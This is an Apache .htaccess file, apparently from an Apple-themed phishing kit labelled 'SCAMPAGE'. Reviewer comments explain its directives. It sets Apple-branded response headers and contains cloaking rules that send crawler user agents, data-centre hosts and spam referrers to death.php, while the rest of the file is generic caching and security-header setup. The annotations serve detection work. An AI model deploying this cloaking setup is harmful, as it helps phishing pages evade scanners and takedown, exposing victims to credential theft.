- #########################################################################
- # ULTIMATE .htaccess FILE FOR SCAMPAGE & PERFORMANCE #
- #########################################################################
- # @Author: DwixRMX #
- # @Author URI: https://l34kc0de.today #
- # License: GNU General Public License v2 or later #
- # License URI: http://www.gnu.org/licenses/gpl-2.0.html #
- #########################################################################
- # DNThirTeen:[CORE]
- # Baseline directives: suppress the server-generated page footer, turn off
- # directory listings, CGI execution and content negotiation, and switch on
- # mod_rewrite for the rule sets further down.
- # Review note: with "-Indexes" and "IndexIgnore *" the directory contents
- # cannot be listed over HTTP, so files deployed next to this .htaccess have to
- # be inventoried from the filesystem or from web-server logs.
- ServerSignature Off
- Options -Indexes
- Options -ExecCGI
- Options -MultiViews
- Options +SymLinksIfOwnerMatch
- IndexIgnore *
- RewriteEngine On
- # Disabled line: would hand files with the custom ".dn13" extension to the PHP handler.
- #AddHandler application/x-httpd-php .dn13 #for custom php extension
- RewriteBase /
- # "Header set" writes RESPONSE headers. The lines below therefore attach fixed
- # values to every response, under names that normally occur only on requests
- # or as CGI variables (Host, Origin, Referer, REMOTE_ADDR, X_FORWARDED_FOR).
- # They do not change the client address or host name the server itself sees
- # or logs.
- # Review note: every host value here is www.apple.com, which, together with
- # the "SCAMPAGE" banner at the top of the file, points to Apple as the brand
- # being imitated. Responses carrying these request-style header names are
- # unusual and can be matched on.
- # NOTE(review): whether the "Server" value really replaces the server's own
- # banner depends on the Apache build and configuration - confirm on a sample.
- <IfModule mod_headers.c>
- Header set X_FORWARDED_FOR: 104.16.77.187
- Header set REMOTE_ADDR: 104.16.77.187
- Header set Server: www.apple.com
- Header set Host: www.apple.com
- Header set Origin: https://www.apple.com
- Header set Referer: https://www.apple.com
- Header set X-Forwarded-Host: www.apple.com
- Header set X-Forwarded-Proto: https
- </IfModule>
- # DNThirTeen:[USER AGENT]
- # Visitor filtering (cloaking). The three rule sets below share one shape:
- #   1. skip requests that already target death.php (avoids a rewrite loop),
- #   2. test one request property against a case-insensitive ([NC]) word list,
- #   3. on a match, internally rewrite the request to /death.php?log and store
- #      the matched word in an environment variable (E=DN13_...:%1).
- # death.php is not part of this listing, so what it logs or returns is unknown.
- # Review note: content served from this directory depends on User-Agent,
- # client hostname and Referer. An automated scanner may therefore receive
- # something different from an ordinary browser visit; a difference in
- # responses between request profiles is itself evidence of cloaking.
- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{REQUEST_URI} !(death.php) [NC]
- #list in regex
- # Substring match on crawler, scraper and site-copier User-Agent tokens.
- RewriteCond %{HTTP_USER_AGENT} (360Spider|acapbot|acoonbot|ahrefs|alexibot|asterias|attackbot|backdorbot|suzuran|takeout|teleport|telesoft|true_robots|turingos|turnit|vampire|vikspider|voideye|webleacher|webreaper|webstripper|webvac|webviewer|webwhacker|winhttp|wwwoffle|woxbot|xaldon|xxxyy|yamanalab|yioopbot|youda|zeus|zmeu|zune|zyborg) [NC]
- RewriteRule .* /death.php?log [L,NE,E=DN13_USER_AGENT:%1]
- </IfModule>
- # DNThirTeen:[REMOTE HOST]
- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{REQUEST_URI} !(death.php) [NC]
- #list in regex
- # Substring match on the client's host name; the list names hosting and
- # data-centre providers (amazonaws, softlayer, colocrossing, ...).
- # NOTE(review): REMOTE_HOST holds a name only when the server resolves client
- # addresses (HostnameLookups); otherwise this condition presumably sees the
- # bare IP and never matches - confirm against the server configuration.
- RewriteCond %{REMOTE_HOST} (163data|amazonaws|colocrossing|crimea|g00g1e|justhost|kanagawa|loopia|masterhost|onlinehome|poneytel|sprintdatacenter|reverse.softlayer|safenet|ttnet|woodpecker|wowrack) [NC]
- RewriteRule .* /death.php?log [L,NE,E=DN13_REMOTE_HOST:%1]
- </IfModule>
- # DNThirTeen:[HTTP REFERRER]
- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{REQUEST_URI} !(death.php) [NC]
- #list in regex
- # Substring match on the Referer header; the words look like a generic
- # referrer-spam keyword list rather than anything specific to this kit.
- RewriteCond %{HTTP_REFERER} (ambien|blue\spill|cialis|cocaine|ejaculat|erectile|erections|hoodia|huronriveracres|impotence|levitra|libido|lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby|ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo) [NC]
- RewriteRule .* /death.php?log [L,NE,E=DN13_HTTP_REFERRER:%1]
- </IfModule>
- # DNThirTeen:[MUTATION BLOCKER]
- # As written this section blocks nothing: the only active access rule is
- # "Allow from All", while the Deny line and the RewriteRule are commented out.
- # Order/Allow/Deny is the Apache 2.2 access syntax.
- # NOTE(review): "#HateCrewDeathRoll" looks like a placeholder where Deny
- # lines are meant to be inserted later - not verifiable from this listing.
- <Limit GET HEAD OPTIONS POST PUT>
- Order Allow,Deny
- #Deny from 127.0.0.1
- #HateCrewDeathRoll
- Allow from All
- # RewriteRule .* - [F,L]
- </Limit>
- # Send plain-HTTP requests to the same host and path over HTTPS with a
- # permanent (301) redirect. The target host is taken from the request's Host
- # header.
- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{HTTPS} !=on
- RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
- </IfModule>
- # ----------------------------------------------------------------------
- # | Compressing and Caching |
- # ----------------------------------------------------------------------
- # Per-MIME-type cache lifetimes via mod_expires. Types not listed fall back to
- # ExpiresDefault (one month).
- <IfModule mod_expires.c>
- ExpiresActive on
- ExpiresDefault "access plus 1 month"
- # CSS
- ExpiresByType text/css "access plus 1 year"
- # Data interchange
- ExpiresByType application/atom+xml "access plus 1 hour"
- ExpiresByType application/rdf+xml "access plus 1 hour"
- ExpiresByType application/rss+xml "access plus 1 hour"
- ExpiresByType application/json "access plus 0 seconds"
- ExpiresByType application/ld+json "access plus 0 seconds"
- ExpiresByType application/schema+json "access plus 0 seconds"
- ExpiresByType application/vnd.geo+json "access plus 0 seconds"
- ExpiresByType application/xml "access plus 0 seconds"
- ExpiresByType text/xml "access plus 0 seconds"
- # Favicon (cannot be renamed!) and cursor images
- ExpiresByType image/vnd.microsoft.icon "access plus 1 week"
- ExpiresByType image/x-icon "access plus 1 week"
- # HTML - keeps the page in the cache for one hour; new content is shown only
- # after that hour has elapsed. If this is not wanted, enter a zero in place of 3600.
- # NOTE(review): this covers every text/html response, presumably including
- # script-generated pages that do not send their own Expires header - confirm.
- ExpiresByType text/html "access plus 3600 seconds"
- # JavaScript
- ExpiresByType application/javascript "access plus 1 year"
- ExpiresByType application/x-javascript "access plus 1 year"
- ExpiresByType text/javascript "access plus 1 year"
- # Manifest files
- ExpiresByType application/manifest+json "access plus 1 week"
- ExpiresByType application/x-web-app-manifest+json "access plus 0 seconds"
- ExpiresByType text/cache-manifest "access plus 0 seconds"
- # Media files
- ExpiresByType audio/ogg "access plus 1 month"
- ExpiresByType image/bmp "access plus 1 month"
- ExpiresByType image/gif "access plus 1 month"
- ExpiresByType image/jpeg "access plus 1 month"
- ExpiresByType image/png "access plus 1 month"
- ExpiresByType image/svg+xml "access plus 1 month"
- ExpiresByType image/webp "access plus 1 month"
- ExpiresByType video/mp4 "access plus 1 month"
- ExpiresByType video/ogg "access plus 1 month"
- ExpiresByType video/webm "access plus 1 month"
- # Web fonts
- # Embedded OpenType (EOT)
- ExpiresByType application/vnd.ms-fontobject "access plus 1 month"
- ExpiresByType font/eot "access plus 1 month"
- # OpenType
- ExpiresByType font/opentype "access plus 1 month"
- # TrueType
- ExpiresByType application/x-font-ttf "access plus 1 month"
- # Web Open Font Format (WOFF) 1.0
- ExpiresByType application/font-woff "access plus 1 month"
- ExpiresByType application/x-font-woff "access plus 1 month"
- ExpiresByType font/woff "access plus 1 month"
- # Web Open Font Format (WOFF) 2.0
- ExpiresByType application/font-woff2 "access plus 1 month"
- # Other
- ExpiresByType text/x-cross-domain-policy "access plus 1 week"
- </IfModule>
- # Compression settings for mod_gzip; the IfModule guard means the block is
- # ignored on servers where that module is not loaded.
- <IfModule mod_gzip.c>
- mod_gzip_on Yes
- mod_gzip_dechunk Yes
- # The leading "." in the pattern below is unescaped and matches any character.
- mod_gzip_item_include file .(html?|txt|css|js|php|pl)$
- mod_gzip_item_include handler ^cgi-script$
- mod_gzip_item_include mime ^text/.*
- mod_gzip_item_include mime ^application/x-javascript.*
- mod_gzip_item_exclude mime ^image/.*
- # Skip responses that are already gzip-encoded.
- mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
- </IfModule>
- # Compress text-like response types with mod_deflate.
- # Review note: compressing HTTPS responses that combine secrets with
- # request-controlled data is the precondition for compression side-channel
- # attacks (BREACH class); on a real application the text/html and PHP types
- # below deserve a second look.
- <IfModule mod_deflate.c>
- # Insert filters / compress text, html, javascript, css, xml:
- AddOutputFilterByType DEFLATE text/plain
- AddOutputFilterByType DEFLATE text/html
- AddOutputFilterByType DEFLATE text/xml
- AddOutputFilterByType DEFLATE text/css
- AddOutputFilterByType DEFLATE text/vtt
- AddOutputFilterByType DEFLATE text/x-component
- AddOutputFilterByType DEFLATE application/xml
- AddOutputFilterByType DEFLATE application/xhtml+xml
- AddOutputFilterByType DEFLATE application/rss+xml
- AddOutputFilterByType DEFLATE application/js
- AddOutputFilterByType DEFLATE application/javascript
- AddOutputFilterByType DEFLATE application/x-javascript
- AddOutputFilterByType DEFLATE application/x-httpd-php
- AddOutputFilterByType DEFLATE application/x-httpd-fastphp
- AddOutputFilterByType DEFLATE application/atom+xml
- AddOutputFilterByType DEFLATE application/json
- AddOutputFilterByType DEFLATE application/ld+json
- AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
- AddOutputFilterByType DEFLATE application/x-font-ttf
- AddOutputFilterByType DEFLATE application/font-woff2
- AddOutputFilterByType DEFLATE application/x-font-woff
- AddOutputFilterByType DEFLATE application/x-web-app-manifest+json font/woff
- AddOutputFilterByType DEFLATE font/woff
- AddOutputFilterByType DEFLATE font/opentype
- AddOutputFilterByType DEFLATE image/svg+xml
- AddOutputFilterByType DEFLATE image/x-icon
- # Exception: Images
- SetEnvIfNoCase REQUEST_URI \.(?:gif|jpg|jpeg|png|svg)$ no-gzip dont-vary
- # Drop problematic browsers
- BrowserMatch ^Mozilla/4 gzip-only-text/html
- BrowserMatch ^Mozilla/4\.0[678] no-gzip
- BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html
- # Make sure proxies don't deliver the wrong content
- # "Header" is a mod_headers directive but is guarded here only by the
- # mod_deflate check; without mod_headers this line is a configuration error.
- Header append Vary User-Agent env=!dont-vary
- </IfModule>
- #Alternative caching using Apache's "mod_headers", if it's installed.
- #Caching of common files - ENABLED
- # Static assets: cacheable by any cache for 2592000 seconds (30 days).
- <IfModule mod_headers.c>
- <FilesMatch "\.(ico|pdf|flv|swf|js|css|gif|png|jpg|jpeg|txt)$">
- Header set Cache-Control "max-age=2592000, public"
- </FilesMatch>
- </IfModule>
- <IfModule mod_headers.c>
- <FilesMatch "\.(js|css|xml|gz)$">
- Header append Vary Accept-Encoding
- </FilesMatch>
- </IfModule>
- # Set Keep Alive Header
- <IfModule mod_headers.c>
- Header set Connection keep-alive
- </IfModule>
- # If your server doesn't support ETags, deactivate them with "None" (and remove the header)
- <IfModule mod_expires.c>
- <IfModule mod_headers.c>
- Header unset ETag
- </IfModule>
- FileETag None
- </IfModule>
- # Same Vary rule as the earlier js|css|xml|gz block, extended to html and font
- # files, so those four extensions get the value appended by both blocks. The
- # leading "." of this pattern is unescaped and matches any character.
- <IfModule mod_headers.c>
- <FilesMatch ".(js|css|xml|gz|html|woff|woff2|ttf)$">
- Header append Vary: Accept-Encoding
- </FilesMatch>
- </IfModule>
- # -----------------------------------------------------------------------------
- # HTTP SECURITY HEADER |
- # -----------------------------------------------------------------------------
- ### @see https://scotthelme.co.uk/hardening-your-http-response-headers
- ### UPDATE 2019
- # Review note: several Header/RequestHeader lines in this section sit outside
- # any <IfModule mod_headers.c> guard, so the file fails to parse on a server
- # without mod_headers.
- # drop Range header when more than 5 ranges.
- # CVE-2011-3192
- SetEnvIf Range (,.*?){5,} bad-range=1
- RequestHeader unset Range env=bad-range
- # optional logging.
- #CustomLog /log common env=bad-range
- # LIMIT UPLOAD FILE SIZE TO PROTECT AGAINST DOS ATTACK. Bytes, 0-2147483647(2GB)
- # The value below is the top of the range quoted above, so it permits request
- # bodies of up to 2 GB and gives little protection; a real limit would be
- # sized to the largest upload the site expects.
- LimitRequestBody 2147483647
- # Don't allow any pages to be framed - defends against clickjacking (framing
- # does not address CSRF).
- # This DENY value is replaced further down by a second
- # "Header set X-Frame-Options" line, so "sameorigin" is what is actually sent.
- Header set X-Frame-Options DENY
- # Only allow JavaScript from the same domain to be run.
- # Don't allow inline JavaScript to run.
- # X-Content-Security-Policy with the "allow" keyword is an early, prefixed
- # form of CSP that current browsers ignore. The standard header is
- # Content-Security-Policy with directives such as default-src 'self'; as
- # written, no policy is enforced.
- Header set X-Content-Security-Policy "allow 'self';"
- ## No-Referrer-Header
- # Outgoing links and form posts from these pages send no Referer header.
- <IfModule mod_headers.c>
- Header set Referrer-Policy "no-referrer"
- </IfModule>
- ## X-FRAME-OPTIONS-Header
- # "Header set" replaces any earlier value, so this overrides the DENY above.
- <IfModule mod_headers.c>
- Header set X-Frame-Options "sameorigin"
- </IfModule>
- ## X-XSS-PROTECTION-Header
- # Legacy header: most current browsers no longer ship the XSS filter it
- # controlled, so it should not be counted as a protection.
- <IfModule mod_headers.c>
- Header set X-XSS-Protection "1; mode=block"
- </IfModule>
- ## X-Content-Type-Options-Header
- <IfModule mod_headers.c>
- Header set X-Content-Type-Options "nosniff"
- </IfModule>
- ## Strict-Transport-Security-Header - if you are NOT serving your website over https, comment this block out
- # includeSubDomains and preload extend the one-year HTTPS-only requirement to
- # every subdomain of the host.
- <IfModule mod_headers.c>
- Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
- </IfModule>
- ## This prevents mis-issued certificates for this website from being used unnoticed. (Experimental)
- ## @see https://tools.ietf.org/html/draft-ietf-httpbis-expect-ct-02
- # Expect-CT has since been deprecated and is ignored by current browsers.
- <IfModule mod_headers.c>
- Header set Expect-CT "enforce, max-age=21600"
- </IfModule>
- # ----------------------------------------------------------------------
- # Webfont access
- # ----------------------------------------------------------------------
- # Allow access from all domains for webfonts. Alternatively you could only whitelist your
- # subdomains like "subdomain.example.com".
- # The wildcard origin applies only to files whose names match the pattern
- # below. The "." inside "font.css" is unescaped and matches any character.
- <IfModule mod_headers.c>
- <FilesMatch "\.(ttf|ttc|otf|eot|woff|font.css)$">
- Header set Access-Control-Allow-Origin "*"
- </FilesMatch>
- </IfModule>
- # ----------------------------------------------------------------------
- # Proper MIME type for all files
- # ----------------------------------------------------------------------
- # Maps file extensions to Content-Type values. These mappings matter together
- # with the "nosniff" header set elsewhere in this file, because the browser
- # will then trust the declared type.
- # JavaScript
- # Normalize to standard type (it is sniffed in IE anyways)
- # further details: tools.ietf.org/html/rfc4329#section-7.2
- AddType application/javascript js jsonp
- AddType application/json json
- #
- # Audio
- #
- AddType audio/ogg oga ogg
- AddType audio/mp4 m4a f4a f4b
- #
- # Video
- #
- AddType video/ogg ogv
- AddType video/mp4 mp4 m4v f4v f4p
- AddType video/webm webm
- AddType video/x-flv flv
- #
- # SVG
- # Required for svg webfonts on iPad
- # further details: twitter.com/FontSquirrel/status/14855840545
- #
- AddType image/svg+xml svg svgz
- # .svgz files are gzip-compressed SVG; declare the encoding so clients decompress them.
- AddEncoding gzip svgz
- #
- # Webfonts
- #
- AddType application/vnd.ms-fontobject eot
- AddType application/x-font-ttf ttf ttc
- AddType font/opentype otf
- AddType application/x-font-woff woff
- #
- # Assorted types
- #
- AddType image/x-icon ico
- AddType image/webp webp
- AddType text/cache-manifest appcache manifest
- AddType text/x-component htc
- AddType application/xml rss atom xml rdf
- AddType application/x-chrome-extension crx
- AddType application/x-opera-extension oex
- AddType application/x-xpinstall xpi
- AddType application/octet-stream safariextz
- AddType application/x-web-app-manifest+json webapp
- AddType text/x-vcard vcf
- AddType application/x-shockwave-flash swf
- AddType text/vtt vtt
- # ----------------------------------------------------------------------
- # End!
- # ----------------------------------------------------------------------